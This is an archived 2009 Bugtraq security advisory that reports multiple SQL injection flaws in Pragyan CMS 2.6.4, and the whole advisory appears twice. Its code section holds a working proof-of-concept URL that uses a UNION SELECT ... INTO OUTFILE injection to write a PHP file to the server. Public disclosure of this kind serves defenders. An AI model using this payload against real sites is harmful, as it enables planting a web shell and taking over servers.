Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Fri, 24 Apr 2009 17:14:55 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=sT6gNEgKvuIE4IR5TMTgZ5mKEoCg+wmdKYamiyixVb8=; b=ltUG9lGaEQZkUXeTPQGdVNNeFHC2lBqb40oDD3vP+dc+5Wpjiyer0vJwfVY2Xt0AzK aVmJOMkzHOdlqutfjjUFfdSu3fOOC7GgoEVEYF5jLmm41rGK3r6NJ+uI1g9vpuoQpdzY n7/yHIXP7CE0Bv493h8A5r54xti+4HI9CYpjU=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=QIFc9DgOelhXouvojB2R6KluMVeETOzpF6ShyuGeinkgVTQkqxYkDAWWs8WyZtwjNa yYCt2q/1qPYcb16I5+KLRxc3zp/NFws8EOYlt2KYSGZ+/qa3oO2LfGQ+3TscE6D0083Q 9dftM5wzbRndCfxHz2T98SZ+sPrvlzWDv1a4I=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
[+] Application: Pragyan CMS
[+] Version: 2.6.4
[+] Website: http://www.pragyan.org
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Date: 22 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple SQL Injection
[-] Risk: hight
[-] Requisites: magic_quotes_gpc = off/on
This web application is entirely vulnerable to
SQL Injection because any variable is not
properly sanitised before being used in an SQL
query. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code.
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/?action=view&fileget=-1' UNION ALL SELECT
'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23
*************************************************
[+] Fix
You must sanitise any user input.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
******* Salvatore "drosophila" Fresta *******
[+] Application: Pragyan CMS
[+] Version: 2.6.4
[+] Website: http://www.pragyan.org
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Date: 22 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple SQL Injection
[-] Risk: hight
[-] Requisites: magic_quotes_gpc = off/on
This web application is entirely vulnerable to
SQL Injection because any variable is not
properly sanitised before being used in an SQL
query. This can be exploited to manipulate SQL
queries by injecting arbitrary SQL code.
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/?action=view&fileget=-1' UNION ALL SELECT
'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23
*************************************************
[+] Fix
You must sanitise any user input.
*************************************************